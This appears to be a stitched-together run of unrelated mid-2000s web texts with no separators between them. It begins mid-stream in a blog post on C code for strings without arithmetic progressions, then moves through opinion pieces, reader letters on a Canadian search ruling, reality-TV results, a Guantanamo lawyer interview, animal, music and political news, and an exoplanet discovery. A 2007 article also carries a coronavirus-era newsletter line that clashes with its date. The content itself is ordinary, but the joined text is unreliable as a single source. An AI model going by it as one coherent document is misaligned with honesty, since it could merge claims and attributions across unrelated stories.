Instead of scanning the strings in the order AAA , AAB , ABA , ABB , BAA , etc. , one can scan them in reverse lexicographic order : AAA , BAA , ABA , BBA , AAB , etc .
Then instead of running off the beginning of the string , p runs off the end , which is allowed .
This fixes the undefined behavior problem and also eliminates the call to strchr that finds the end of the string .
This is likely to produce a significant speedup : unsigned strinc ( char * s ) { while ( *s == ' A ' + colors - 1 ) *s++ = ' A ' ; if ( !*s ) return 0 ; ( *s ) ++ ; return 1 ; } Here we 're depending on the optimizer to avoid recomputing the value of ' A ' + colors - 1 every time through the loop .
The heart of the program is the apchk ( ) function , which checks whether a string q contains an arithmetic progression of length 3 : int apchk ( q ) char * q ; { int f , s , t ; for ( f=0 ; f <= length - 3 ; f++ ) for ( s=f+1 ; s <= length - 2 ; s++ ) { t = s+s-f ; if ( t >= length ) break ; if ( ( q [ f ] == q[s ] ) && ( q [s ] == q[ t ] ) ) return YES ; } return NO ; } I hesitate to say that this is the biggest waste of time in the whole program , since after all it is a program whose job is to examine 7,625,597,484,987 strings .
But look .
2/3 of the calls to this function are asking it to check a string that differs from the previous string in the final character only .
Nevertheless , it still checks all 49 possible arithmetic progressions , even the ones that did n't change .
The t ≥ length test is superfluous , or if it is n't , it should be .
Also notice that I was n't sure of the precendence in the final test .
It did n't take me long to figure out that this program was not going to finish in time .
I wrote a series of others , which I hope to post here in coming days .
The next one sucks too , but in a completely different way .
[ Addendum 20071005 : Here is part 2 . ] [ Addendum 20071014 : Here is part 3 . ]
[ Other articles in category / prog ] permanent link
Future historians will almost certainly regard the failure of the United States to lead in global environmental policy as an even greater mistake than the invasion of Iraq .
The first thing the next American president should do upon taking office is to insist that the U.S. Congress pass a huge increase in gas taxes .
To be more precise , the United States should implement steep carbon taxes that hit coal , heating oil , and natural gas .
The tax should be enough to raise the price of gasoline by at least $ 2 a gallon .
But unlike Europe ’s consumer - oriented gasoline tax , it should hit everyone in the economy , including manufacturers .
No other specific policy action will be half as effective in changing America ’s engagement with the world .
No other presidential directive would so clearly disown the United States ’ record of lamentable and self - centered head - in - the - sand energy policies .
There is no way the United States can hope to persuade China and India to adopt more environmentally friendly growth strategies without first acknowledging its own responsibility — and then doing something about it .
At the same time , a carbon tax might finally convince the rest of the world that the United States does not aim to invade countries to preserve cheap oil .
Such a tax would raise massive revenues that will help reduce current and prospective U.S. deficits .
The revenues would help ease the pressure that excessive American borrowing is putting on international capital markets , pressure that is now contributing to a dangerous collapse of the dollar .
Of course , some of the new tax revenue should be earmarked for scaling back other taxes and for providing subsidies to low - income citizens to offset the burden of the carbon tax .
Court allows unjust search
Feb. 13
The Charter of Rights and Freedoms acknowledges that Canadians enjoy certain liberties and protection from the arbitrary acts of government and the legal system .
The Constitution does not , however , give the courts the right to choose – on the basis of alleged worries about serious crimes – when the fundamental freedom from illegal search and seizure should be suspended .
That was at issue when the Ontario Court of Appeal " approved the use of evidence obtained through flagrant police misconduct . "
It is to be hoped that this matter will find its way to the Supreme Court of Canada .
Allowing lower courts to cherry - pick when the Constitution shall or shall not be upheld amounts to judicial activism of the worst sort , undermines the rule of law and threatens to bring the criminal justice system into disrepute .
Howard A. Doughty , Richmond Hill
Associate Chief Justice Dennis O'Connor and Justice James MacPherson of the Ontario Court of Appeal should be commended for upholding the trial judge 's decision in this case .
Too many criminals are walking free because of some silly technicality allowed by a flawed Charter of Rights , which gives more leeway to those who break the law than it does to the police and courts .
Was it so horribly wrong of OPP Const .
Brian Bertoncello to stop and search a car without apparent justification ?
Hardly .
Police officers do it all the time in R.I.D.E. and similar safety programs .
It is uplifting to see some common sense applied in the justice system .
Eileen Hutcheson , Acton , Ont .
What a stunning story .
That our Charter of Rights – which draws a clear line in the sand between what is acceptable by police and what is not in the course of performing their duties – has been ignored is frightening .
That two judges actually defied the very law that they pledged to uphold is appalling .
At a time when our justice system is justifiably under scrutiny ( most recently , charges against six Toronto police officers were stayed due to the length of the process ) , these Ontario Court of Appeal judges decided to condone illegal police activity .
When the majority concluded that the public was willing , in this case , to accept Charter violations committed by the officer , they made a huge error in judgment .
At no time is the public willing to accept Charter violations .
Michel De Lottinville ,
Wasaga Beach , Ont .
Hallelujah !
At last , a decision from the courts that makes sense .
Turning a blind eye to 35 kilograms of cocaine because of a technicality would grievously impact the confidence of Canadians in the justice system .
This is the first tangible step to recognizing that the bad guys can't be allowed to hide behind laws that were meant to protect the innocent , not the guilty .
Who seriously believes that we should let this guy walk after finding 35 kilos of cocaine in his vehicle ?
Only lawyers , I guess .
Judy Reddick , London , Ont .
It 's nice to know that our justice system is now run so efficiently that the Ontario Court of Appeal can simply override the Charter of Rights .
I guess Section 8 , which states that " everyone has the right to be secure against unreasonable search or seizure , " should be amended to include " unless you might have something to hide . "
But do n't panic , citizens .
The court has graciously concluded that " the public , at least in this case , is willing to put up with the significant Charter violations committed by ( the OPP officer ) . "
Peter Hawes , Richmond Hill
Finally , a court has properly put public safety ahead of the rights of suspected wrongdoers .
For years , the courts have thought it best to dismiss charges when the accused 's rights were violated , as though two wrongs made a right .
If someone is suspected of a crime and the evidence is improperly obtained , it is best for society that the crime be dealt with .
If the police are also guilty of wrongdoing in performing their duties , that should be dealt with as a separate issue .
Eric Severn , Toronto
More proof that the government , police and judiciary in Canada are all systematically corrupt .
Cops are allowed to break rules for the " greater good " ?
I thought the " rule of law " was the thing that separated us from the head - chopping savages of other nations .
Apparently not .
Russell Barth , Ottawa
This decision is a hugely welcome change .
The rights of honest citizens are becoming more important than the rights of criminals .
Who would have thunk it ?
Claude Gannon , Markham
The Biggest Loser Season 4 Winner Bill Germanakos ( PHOTOS )
The Biggest Loser Finale - Season
Four is finally here .
The head count is down to the final four contestants from who will vie for $ 250,000 and an array of endorsements that are sure to follow .
THE WINNER IS BILL GERMANAKOS .
HE LOST 164 POUNDS .
STARTING WEIGHT WAS 334 AND CURRENT WEIGHT IS 170 FOR A PERCENTAGE WEIGHT LOSS OF 49 % .
Alison Sweeney of Days of our Lives has been this seasons host .
The teams have been led by professional trainers Kim Lyons , Bob Harper and Jillian Michaels .
The NBC reality series pitted 18 contestants who were divided into three teams .
The four remaining contenders for the title are all from the black team .
They are Hollie who lost 64 pounds while on campus , Isabeau 81 pounds , Julie 58 pounds and Bill 130 pounds .
The team members are no longer on campus .
They have been sent home to resume their normal lives with what they have learned , presumably working out and sticking to their new healthy eating habits .
The final reveal and weigh in will be televised live .
Everyone comes away a winner .
If you think the fourteen contestants voted off during the course of the show are out of the picture , think again .
They will also get a chance to weight in and that group will vie for $ 100,000 .
THE WINNER OF THIS CATEGORY IS JIM GERMANAKOS .
HE LOST 186 POUNDS - 51 % .
HIS STARTING WEIGHT WAS 361 - HE NOW WEIGHS 175 .
Season 5 will debut on January 1 , 2008 .
That show will change the format to include family teams consisting of married couples or parent and child duos .
For indispensable reporting on the coronavirus crisis , the election , and more , subscribe to the Mother Jones Daily newsletter .
On Monday , the Pentagon announced that it has charged six Guantanamo detainees with involvement in the terror attacks of September 11 , 2001 .
The infamous detention facility was also in the news last week when its top commander , Rear Admiral Mark Buzby , confirmed in an interview with the Associated Press that there is a secret area inside Guantanamo Bay known as Camp 7 — where key al Qaeda suspects are housed .
This announcement was not news to International Red Cross inspectors , who have toured the mysterious camp ( but whose findings remain confidential ) , nor to the detainees ’ attorneys .
One of those attorneys is Clive Stafford Smith , who has represented 75 Guantanamo detainees .
“ There are so many things that come to light that are actually blindingly obvious all along , ” he says .
“ And [ Camp 7 ] is a good example … .
It ’s yet another secret of that place leaking out . ”
In fact , there are myriad secrets within the confines of the barbed - wire fences of Guantanamo .
They remain hidden from the public ’s view , but they are well known to those who have defended detainees there since the United States Supreme Court granted lawyers such access in 2004 .
The job of these defense attorneys is to expose the truth , about their clients , and about the detention center .
“ There ’s [ nothing ] that you know about Guantanamo that has n’t come out through the lawyers , ” says Stafford Smith , 48 , who travels to Cuba every two months , from his home outside London .
But this job becomes very difficult when those in charge are consistently changing the ways in which they describe what goes on at the prison .
“ The military is constantly making statements that are downright false because they ’ve redefined the language , ” explains Stafford Smith .
“ It is a way of looking people in the eye and lying , but having some pretense that you ’re not . ”
Nowhere is this issue more evident than in the situation surrounding some 60 juveniles who have been held at Guantanamo .
In April 2003 then Joint Chiefs of Staff Chairman Gen. Richard B. Myers admitted that children as young as 13 were being held at the prison , but qualified , “ They ’re not on a Little League team anywhere .
They ’re on a major league team , and it ’s a terrorist team . ”
After three juveniles were released from the camp in January of 2004 , Pentagon spokesperson Lt. Commander Barbara Burfeind told the BBC , “ We do n’t plan on detaining juveniles at Guantanamo further , ” but Stafford Smith calls Burfeind ’s statement “ absolute rubbish . ”
He should know ; he represents two of the juveniles who are still being detained : Mohammed El Gharani , now 21 , and Omar Khadr , 22 , who have been in Guantanamo since they were minors .
The military , Stafford Smith says , has simply changed the definition of the term “ juvenile . ”
“ In their minds … [ it ] means someone who is under the age of 16 today , whereas legally the term juvenile as recognized by the United States Supreme Court and every international body in the world means that you were under 18 [ when ] you committed whatever offense you [ allegedly ] committed . ”
El Gharani was just 14 in 2001 when Pakistani authorities seized him and sold him to the United States for a bounty .
Bounties like the one used to nab El Gharani are far from rare in the war on terror ; in fact , they ’re something that most Guantanamo detainees have in common .
“ Virtually everyone — well not everyone , but a large majority of the prisoners in Guantanamo — was sold to the United States for bounties , ” says Stafford Smith .
In the months after 9/11 , bounty leaflets were publicly distributed throughout Pakistan .
One read , “ Get wealth and power beyond your dreams .
Help the Anti-Taliban Forces rid Afghanistan of murderers and terrorists . ”
It worked .
General Pervez Musharraf boasted in his 2006 memoir
In the Line of Fire , “ We have played cat and mouse with [ al Qaeda ] .
We have captured 689 and handed over 369 to the United States .
We have earned bounties totaling millions of dollars . ”
$ 5,000 is still the going rate for snitching on a suspected terrorist there .
And this a hard incentive for many to pass up ; based on Pakistan ’s per-capita GDP this payoff is equivalent to $ 250,000 in the United States .
“ Look around and tell me who you would be prepared to snitch on for a quarter of a million dollars if all you had to do was say , ‘ I saw him in Tora Bora , ' ” says Stafford Smith .
He continues , “ And there ’s a terrible inevitability to this cycle of torture once you begin down that route .
Imagine I sell you out and I say I saw you at Tora Bora … You say I was n’t in Tora Bora .
But [ United States officials ] think you were so they start applying the enhanced interrogation techniques on you .
It ’s not very long before you say , ‘ Alright I was in Tora Bora . ’
But they did n’t think they were torturing an innocent person to get an innocent person to confess falsely ; they thought you were guilty .
So when you do confess , they think , ‘ Ah ha , she ’s guilty ! ’
And at that point you ’ve got a one - way ticket to Guantanamo . ”
Bounties are one of many strategies that yield unreliable results ; as is subjecting mentally ill detainees to harsh interrogation techniques leading to false confessions .
Another one of Stafford Smith ’s clients , a Moroccan father of two who immigrated to England in the 1980’s , Ahmed Errachidi , was committed for bipolar disorder long before the war on terror began .
But he too was sold by Pakistan to United States authorities and eventually flown to Guantanamo .
Stafford Smith recounts ,
“ They ’re interrogating him and they ask him , ‘ Are you a foot soldier for Bin Laden ? ’
Well he ’s psychotic at the time , so he says ‘ No , no I ’m not a foot soldier for Bin Laden .
I ’m Bin Laden ’s general . ’
So they …announced publicly in the media that they had the general of al Qaeda — the leader of the military wing of al Qaeda . ”
Errachidi also told his interrogators that a large snowball would soon envelop the earth , but that was n’t reported at any press conference .
Last May , five years after he was seized , Errachidi was set free , when it was established that he was working as a cook at the Westbury Hotel in London at the time the United States government alleged he was training with al Qaeda in Afghanistan .
Other Guantanamo detainees are n’t mentally ill from the get - go — but they became that way during detainment .
Binyam Mohamed , who was arrested in Pakistan on a visa violation and then turned over to United States authorities , has developed a habit of smearing feces onto the walls of his cell .
Stafford Smith says it ’s because he “ suffered torture that really should have been left in the Middle Ages . ”
On July 21 , 2002 , nearly two years before being transported to Guantanamo , he was flown on a CIA plane to Morocco where his captors took a razor blade to his genitals .
Now , officials at Guantanamo claim he soils his cell as an act of defiance , but Stafford Smith believes it ’s the result of trauma .
“ Instead of treating him , they turn the water off in his cell as punishment which merely exacerbates the health problem .
And the most recent thing they ’ve done just last week is they ’ve announced that if he does n’t clean his cell up they ’ll ban lawyers from visiting him . ”
At a press conference in September of 2006 , President Bush quoted a European delegate who , after visiting the facility , called it a “ ‘ a model prison ’ where people are treated better than in prisons in his own country . ”
But Stafford Smith could n’t disagree more .
“ I have spent 24 years doing death penalty cases in the deep South .
I ’ve been to most of the worst prisons there and Guantanamo is worse than any death row in America , ” he said .
Since prisoners first arrived at Guantanamo on January 11 , 2002 , the International Red Cross has condemned the indefinite detention of prisoners there , and the United Nations has found that techniques used at Guantanamo “ amount to degrading treatment in violation of the [ Geneva Conventions ] ” and recommended that it be closed “ without further delay . ”
Just last month , Joint Chiefs of Staff Chairman Admiral Mike Mullen said it should be shut down because it ’s damaging to the world ’s opinion of the United States , yet 275 detainees remain there .
Why , in the face of international scorn and persistent pressure , have the detainees not been released or moved to a prison in the United States ?
“ Among the people in power , there is an awful lot of ignorance of not knowing what ’s really happening there , ” says Stafford Smith .
“ I think they really believe that the people in Guantanamo are all bad guys and they should n’t have any legal rights .
I do n’t think they ’re just keeping Guantanamo there for the hell of it , I think they believe in it . ”
But with 501 people released from Guantanamo so far , there have been no fewer than 501 mistakes — failures of policy , philosophy , and implementation .
Of those 501 former detainees , 35 have been Stafford Smith ’s clients , but he does n’t attribute his success to the sympathetic nature of the cases he ’s taken on —he does n’t hand pick his clients .
“ It ’s because the whole process is such a catastrophe , ” he explains .
“ The success we have had is because the Bush administration has done terrible things and should never have done them .
It ’s a matter of justice winning out . ”
People are not the only ones feeling the harsh effects of home foreclosures .
Pets are also victims — they lose their families , are abandoned or neglected or are left at shelters .
Many animal shelters across the nation report that they are seeing numerous animals being surrendered because of economic reasons , including foreclosure .
A spokesman for The Animal Welfare League in Chicago said , “ We ’re probably getting 25 [ animals ] a week coming to us for those reasons .
It ’s probably increased a lot in the past six to seven months . ”
As people are foreclosing on their house and moving into an apartment , some people give up their pets because apartments may not be pet - friendly or it costs more to have a pet in an apartment with pet rent or additional pet deposits .
Some of these pets end up in shelters and some of these are neglected and left at the foreclosed home .
Officials around the nation have reported finding all types of pets being left at foreclosed houses and farms .
In one case , 63 cats were left at a home in Cincinnati .
Stephanie Shain of the Humane Society of the United States said , “ This is n’t the first time we ’ve seen people abandoning their pets ; it ’s a problem throughout the year , when people move and ca n’t take their pets .
But with this increase in foreclosures , we ’re going to see more of it .
Far too often , those animals die in those homes , and it ’s a better scenario to get them to a shelter so that their last days are not spent alone , trying to eat wallboard or whatever they can find . ”
But for some pets , even though they have been abandoned , they find a happy ending when they are adopted or when their owners take them back from foster care after their financial situation is in a better state .
The 63 cats ( two of them pictured here ) that were found abandoned in Cincinnati have also found a happy ending .
Many of the cats have found new homes .
One of the people who took in two of the cats even created a web site , foreclosurecats.org , to provide updates on the cats and to also raise funds by selling artwork to pay for the cats ’ veterinary bills and expenses .
Source : Chicago Tribune
( Thanks Lynne and Julie )
YouTube disables anti-torture activist 's account
YouTube , not the Egyptian government , has suspended anti-torture activist and blogger Wael Abbas from posting videos of state - sanctioned abuses in his home country for the world to see .
" It 's the first time that people saw something like that , " says Abbas .
" They saw that people are really in pain and agony , and being tortured , and being beaten , and being sodomized .
And it was a shock to the Egyptian people . "
Says CNN , the Egyptian government is " slowly responding " to the attention brought to abuses of citizens , and Abbas ' video footage helped bring to justice two officers in the torture of one 21 - year - old man .
Says Abbas of YouTube 's suspension of his account :
" With what they are doing now , they are helping tyrants , they are helping torturers , they are helping dictatorships .
This is not really helping people who are fighting for democracy in 3rd world countries .
We thought that YouTube was our ally ; it helped show the truth in countries like Burma , but with what they did now , it does n't seem like that anymore . "
Repeated complaints about " offensive videos " do lead to suspension of YouTube accounts , says a spokesperson , who would not comment specifically on Wael Abbas ' case .
Video of the report can be viewed below , as broadcast on CNN's The Situation Room with Wolf Blitzer on November 29 , 2007 .
Kung - fu's influence on hip hop has been around since the ' 70s , when B - boys busted Bruce Lee moves while break - dancing .
But in 1993 , gritty rap supergroup the Wu - Tang Clan released Enter the Wu - Tang ( 36 - Chambers ) , the first chart - topping album to kick up raw rhymes with dialog sampled from underground Hong Kong flicks .
The Wu has since sold nearly 6 million albums , all featuring snippets from producer RZA 's personal collection of action imports — which boasts more titles in the genre than the Library of Congress .
" The people who made these movies did n't know how much one sentence could inspire , " says RZA , who also scored Quentin Tarantino 's Kill Bill saga and other films .
In December , the Clan 's eight remaining members ( RIP , ODB ) reunite for their fifth release , The 8 Diagrams .
RZA gave WIRED the dope on Wu - Tang 's cinematic source material and sounded off on a selection of rare movie clips .
Film Time : 100:14:02 Film : Shaolin & Wu Tang Year : 1981
Film Time : 206:19 Film : Five Deadly Venoms Year : 1978
Album : Enter the Wu - Tang ( 36 Chambers ) Year : 1993 Song Time : 00:01 Sample : " 1A game of chess is like a swordfight .
[ sword effects ]
You must think first [ sword effects ] before you move .
2 The toad style is immensely strong and immune to nearly any weapon .
When it 's properly used , it 's almost invincible . "
RZA : " It was perfect for what I was trying to say about my crew .
That 's how I felt Wu was — almost invincible . "
https://www.wired.com/wp-content/uploads/archive/images/multimedia/magazine/1511/pl_music1.mp3
Song : " Bring Da Ruckus "
Film Times : 100:11:15 , 200:11:02 , 300:14:17 Film : Shaolin & Wu Tang Year : 1981
Film Time : 400:58:44 Film : Ten Tigers from Kwangtung Year : 1979
Album : Enter the Wu - Tang ( 36 Chambers ) Year : 1993 Song Time : 00:01 Sample : " 1Shaolin shadowboxing and the Wu - Tang sword style .
2 If what you say is true , the Shaolin and the Wu - Tang could be dangerous .
3 Do you think your Wu - Tang sword can defeat me ?
4 En garde , I 'll let you try my Wu - Tang style . "
RZA : " It opens the album and sets the tempo for what the group was about .
It brought listeners to the world we were in . "
https://www.wired.com/wp-content/uploads/archive/images/multimedia/magazine/1511/pl_music2.mp3
Song : " Da Mystery of Chessboxin ' " Song : " Maria "
Film Time : 00:23:40 Film : The Four Assassins ( aka Marco Polo ) Year : 1975
Album : Wu - Tang Forever Year : 1997 Song Time : 00:02:37
Sample : " You people are all trying to achieve the impossible .
That 's exactly what we 've done .
But , you 'll fail and you 'll all die .
If we die the next generation will fight them too and the one after them for as long as they must and eventually we shall succeed . "
RZA : " The movie did n't deal with all the facts , but it resonated with me ... "
https://www.wired.com/wp-content/uploads/archive/images/multimedia/magazine/1511/pl_music3.mp3
Song : " Little Ghetto Boys "
Film Time : 00:00:32 Film : Invincible Armour Year : 1977
Album : Wu - Tang Forever Year : 1997 Song Time : 04:31 Sample : " One is invulnerable .
In fact it involves strenuous breath control and of all techniques it 's the most difficult .
The human body has 108 pressure points .
36 of these can be fatal , the remainder paralyzing . "
RZA : " These lines are so obscure , I knew people did n’t know them .
We brought new light to these movies — and the listener . "
https://www.wired.com/wp-content/uploads/archive/images/multimedia/magazine/1511/pl_music4.mp3
Song : " Intro ( Shaolin Finger Jab / Chamber Music ) "
Film Times : 100:01:12 , 200:01:22 , 300:02:12 Film : Five Deadly Venoms Year : 1978
Film Time : 41:26:32 Film : Wu Tang vs. Ninja ( aka Ninja Hunter ) Year : 1983
Film Time : 500:3:58 Film : The Iron Monkey Year : 1977
Album : The W Year : 2000 Song Time : 00:07 Sample : " 1I must tell you that the Clan is a danger to the public ... 2 but still for many men just to hear of the name fills them with hate and loathing .
But why ?
They 've never harmed anyone .
I 'm afraid they did , in the past ... "
3 There 's something that I would like you to do .
First I 'll tell you about their styles , the poison clan techniques , the five main styles ...
4 Shaolin finger jab !
5 We 're watching your whole group around the clock .
All we need is your orders to move ...
You kill everyone — young and old ! "
RZA : " Seven of Wu 's nine members all served hard prison time .
People were scared of us .
This sample reflects that mind state . "
https://www.wired.com/wp-content/uploads/archive/images/multimedia/magazine/1511/pl_music5.mp3
Song : " Wolves "
Film Time : 00:48:23 Film : The Eight Diagram Pole Fighter Year : 1983
Album : The 8 Diagrams Year : 2007 Song Time : 00:01 Sample : " We 're fighting to stop the wolves ! " RZA : " This movie inspired me to form the Clan .
It 's about brotherhood .
Beyond our fly name and shit , that 's what Wu - Tang is all about . "
https://www.wired.com/wp-content/uploads/archive/images/multimedia/magazine/1511/pl_music6.mp3
BONUS : " Wu - Tang was more like an awakening type of group ... "
https://www.wired.com/wp-content/uploads/archive/images/multimedia/magazine/1511/pl_music7.mp3__Listen to full interview:__
Download full interview
See the samples on film :
PlayPrevious : What 's Wired This Month : The Animal Kingdom in Ultra - Hi-Res , iminilikewithyou.com , Sigur Rosnext : Reviews : World in Conflict Cold War for PC , Coen Bros ’ No Country for Old Men , How to Build an Igloo
A snake in the Australian state of New South Wales has had a lucky escape after a sneaky snack led to emergency stomach surgery .
The 80 - cm ( 32 - inch ) carpet python mistook golf balls - left by a couple in their chicken coop to encourage hens to lay - for eggs , and ate four of them .
The couple took the python to the Currumbin Wildlife Sanctuary where vets decided that the snake had no chance of passing the balls .
Vets operated on the snake , making an incision through which the golf balls were successfully removed .
Vets say the snake , nicknamed Augusta after the US golf course , is making a full recovery and will be returned to the wild .
Back 1 2 3 4 5 Next
E-mail this to a friend Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
Public executions are still a fact of life in some countries today
It voted 104 in favour and 54 against with 29 abstentions on a resolution which , while non-binding , reflects the view of most member states .
Unusually , the US sided with countries like China and Iran to oppose it .
It calls on countries with the death penalty to respect international standards and establish a moratorium .
The UN 's humanitarian panel approved the resolution last month .
Heated debate
UN Secretary General Ban Ki-moon hailed what he called a bold step by the international community .
We will continue to implement policies that work for us and best serve the interests of our people
Vanu Gopala Menon
Singaporean envoy to UN
But Singapore 's ambassador to the UN , Vanu Gopala Menon , spoke for those countries who say the death penalty is not a human rights issue but a matter of criminal justice .
" This resolution will make no difference to Singapore 's policies , " he said .
" We will continue to implement policies that work for us and best serve the interests of our people . "
The vote followed a heated debate in the Human Rights Committee of the UN as Singapore accused countries in favour of the moratorium on the death penalty of trying to impose their values on the rest of the world , the BBC's Laura Trevelyan reports from the UN .
Mexican ambassador Claude Heller argued the resolution was not an attempt to impose one set of views on others .
" Our intention is to promote and to strengthen the growing trend towards the elimination of the death penalty , " he said .
Most countries in the world do not have the death penalty , our correspondent adds .
Only 51 nations retain the right to use it , down from 60 countries three years ago .
In a sign of the rapidly shifting dynamics of the Republican presidential contest , Mitt Romney on Monday became the first candidate to run a TV attack ad , slamming Mike Huckabee on immigration in a bid to brake his rival ’s sharp rise in the polls .
Romney ’s assault comes amid new polls suggesting that white evangelicals -- a major Republican voting bloc -- have started rallying strongly behind Huckabee after months of wavering among candidates across the field .
Huckabee ’s surge is especially threatening to Romney , a former Massachusetts governor who has long hoped his rightward tilt would appeal to evangelicals despite their often skeptical view of his Mormon faith .
Romney ’s new ad , which began airing in Iowa , describes him and Huckabee , a former Arkansas governor and Southern Baptist preacher , as “ two good family men . ”
Advertisement
“ Both pro-life , both support a constitutional amendment protecting traditional marriage , ” an announcer says .
“ The difference ?
Mitt Romney stood up and vetoed in - state tuition for illegal aliens , opposed driver ’s licenses for illegals .
Mike Huckabee ?
Supported in - state tuition benefits for illegal immigrants .
Huckabee even supported taxpayer - funded scholarships for illegal aliens . ”
Responding to a similar Romney attack last week in a Florida debate , Huckabee defended his Arkansas policies on college aid for students whose parents were illegal immigrants .
“ In all due respect , we ’re a better country than to punish children for what their parents did , ” Huckabee said .
Huckabee has also tried to bolster his conservative credentials on immigration with a new ad of his own , along with a new plan to toughen border enforcement .
“ Our government has failed us , ” Huckabee says in the ad .
“ Build a border fence .
Secure the border , and do it now . ”
Advertisement
Romney spokesman Eric Fehrnstrom called the ad a fair comparison of the candidates ’ records :
“ I think what happens whenever a candidate moves up in the polls is that they attract more attention to their record , and what people will find with Mike Huckabee is someone who is soft on illegals and hard on the American taxpayer . ”
Huckabee presided over both tax cuts and increases as governor .
An offshoot of the Club for Growth , an anti-tax group , has been running television ads criticizing him for raising taxes .
Even with attacks on Huckabee mounting , two polls released Monday found that he had rocketed into the top tier of Republican candidates -- not only in Iowa , which holds the nation ’s first nominating contest on Jan. 3 , but nationwide .
Advertisement
A CNN survey found former New York Mayor Rudolph W. Giuliani supported by 24 % of Republican voters nationally , followed by Huckabee at 22 % -- a statistical tie .
A CBS News / New York Times poll found Giuliani favored by 22 % and Huckabee 21 % -- also a virtual tie .
Both surveys found Romney in third place with 16 % .
More ominously for Romney , who has spent millions on television advertising in Iowa , New Hampshire and other early - voting states , the CBS / New York Times poll found Huckabee strongly favored by white evangelicals .
Election analysts viewed Romney ’s decision to risk a backlash from negative advertising as a sign of his heightened concern .
“ When you go to the attack ad , that shows you ’re getting nervous , ” said Dennis Goldford , a political science professor at Drake University in Iowa .
Huckabee ’s ability to counterattack is limited by his campaign treasury .
The most recent public finance statements show that Romney had raised nearly $ 63 million by the end of September , including $ 17.3 million from his own personal fortune .
Huckabee had raised $ 2.3 million at the time , although aides say his fundraising pace has improved in recent weeks .
Advertisement
Bob Wickers , Huckabee ’s chief media consultant , called Romney ’s move a mistake , saying it would turn off Iowa voters .
“ They want to hear the presidential candidates talk about what they ’re going to do and why they ’re qualified to be president of the United States , not why other people should be disqualified , ” Wickers said .
“ Mitt Romney has n’t been able to do that .
He has n’t been able to connect . ”
michael.finnegan@latimes.com
--
Advertisement
Iowa debates
The Republican presidential candidates will debate Wednesday in Johnston , Iowa .
The forum will be broadcast at 11 a.m. Pacific time on CNN and Fox News .
On Thursday , the Democratic candidates will debate in Johnston .
The event will be broadcast at 11 a.m. by the same networks .
The dotted line shows the planet 's orbit around the star HD189733 .
The planet orbits the star once every 2.2 Earth days , crossing the face of the star well below its equator .
The small circles indicate the planet ’s location during each of Seth Redfield ’s more than 200 HET observations over the course of one Earth year .
The red circles indicate observations during transit ; the rest of the circles denote out - of - transit observations .
Credit : S. Redfield / T. Jones / McDonald Obs .
University of Texas at Austin astronomer and Hubble Fellow Seth Redfield has used the Hobby - Eberly Telescope ( HET ) at McDonald Observatory to make the first ground - based detection of the atmosphere of a planet outside our solar system .
" It 's a remarkable pioneering discovery , " said McDonald Observatory Director David L. Lambert .
The work is an incremental step in finding life in the universe , falling between the initial detections of planets around other stars ( known as " extra - solar planets " or " exoplanets " ) , and the anticipated discovery of planets similar to Earth .
" What we all want to find is a planet with an Earth - like atmosphere , " Redfield said .
The planet Redfield studied orbits HD189733 , a star about 63 light - years away in the constellation Vulpecula , the little fox .
But it 's not like Earth .
The planet is 20 percent more massive than Jupiter , and orbits very close to its parent star ( more than 10 times closer than Mercury is to our Sun ) .
From Earth 's line of sight , the planet passes directly in front of the star on each orbit .
It was this " transit " property that allowed the planet 's discovery in 2004 by Francois Bouchy of France 's Laboratoire d'Astrophysique de Marseille , and the detection of its atmosphere in 2007 by Redfield .
His team for this project included University of Texas at Austin astronomers Michael Endl , William Cochran and Lars Kosterke .
That means this planet , HD189733 b , is what 's known as a " transiting extra - solar planet . "
Astronomers have only once before detected the atmosphere of a planet orbiting another star in such a way , using a now inoperable instrument on Hubble Space Telescope , the Space Telescope Imaging Spectrograph ( STIS ) .
" STIS broke soon after the detection , and there was no capability to do this from space .
Ground - based observations are the only option at this time , " Redfield said .
The feat has been tried unsuccessfully several times from the ground in recent years , he said .
In most cases , astronomers had studied their target stars through only one transit .
" I knew we had to take it one step further , " Redfield said .
" I knew that we would probably have to go for many transits " to detect the atmosphere .
He studied 11 transits over the course of a year with HET and its High Resolution Spectrograph .
To obtain the planet 's ' transmission spectrum , ' and thus the chemical composition of its atmosphere , he used what he called " a very straightforward " technique .
" Take a spectrum of the star when the planet is in front of the star , " he said .
" Then take a spectrum of the star when it 's not .
Then you divide the two and get the planet 's atmospheric transmission spectrum . "
Straightforward , but not easy .
The light blocked by the planet is a mere 2.5 percent of the star 's total light , plus another 0.3 percent for the planet 's atmosphere .
" Each time the planet passes in front of the star , " Redfield said , " the planet blocks some of the star 's light .
If the planet has no atmosphere , it will block the same amount of light at all wavelengths .
However , if the planet has an atmosphere , gasses in its atmosphere will absorb some additional light . "
It was predicted that sodium atoms should be present in the atmosphere .
The atmosphere of the planet will absorb more starlight at those wavelengths that correspond to specific transitions of the sodium atom .
" This causes the planet to appear larger , since we now ' see ' the planet plus the atmosphere , and we measure more blocked light from the star , " Redfield said .
When studying the planet at the particular wavelength of the sodium transition , the planet appears about 6 percent larger than at other wavelengths .
The detection of sodium was possible because there 's a lot of it there , and the atomic transition is strong and falls within the visual range that ground - based telescopes can detect .
" Many other atomic and molecular constituents of the atmosphere may be studied in a similar way , including potassium and hydrogen , " Redfield said .
" I look forward to the detection of other gasses around this planet , " Lambert said .
And , " I wish every success for Seth as he chases oxygen , water vapor and other molecules - indicators of life - around planets far more accommodating to life than this one . "
The data analysis involved studying hundreds of observations spread over a year , taken under different conditions .
Redfield and his collaborators removed contamination to the data caused by water vapor in Earth 's own atmosphere , modeled how the star itself may have contributed to their measurements , and more , to make sure their detection was sound .
In the end , the extra - solar planet 's ' transmission spectrum ' from HET was much higher resolution than that previously made with Hubble Space Telescope on a different planet .
" I was actually surprised and encouraged that it was even possible , " Redfield said .
" We 've proved that it 's possible .
Let 's start doing this for other transiting planets .
Let 's start doing ' comparative exoplanetology . ' "
" It is just breathtaking how fast the progress in the field of exoplanets is , " said Redfield 's collaborator , Michael Endl .
" We have arrived at a point where we can study the composition of the atmospheres of ' hot Jupiters ' in great detail .
The HET is not only a planet finder now , but also a great tool to examine the atmospheric features of transiting extrasolar planets with unprecedented resolution .
I can't wait to see how the results for the other planets will compare to our initial findings . "
Redfield said HET can study the atmospheres of many of the brightest transiting planets .
The Hobby - Eberly Telescope is a joint project of The University of Texas at Austin , The Pennsylvania State University , Stanford University , Ludwig - Maximilians - Universität München , and Georg - August - Universität Göttingen .
Source : University of Texas at Austin
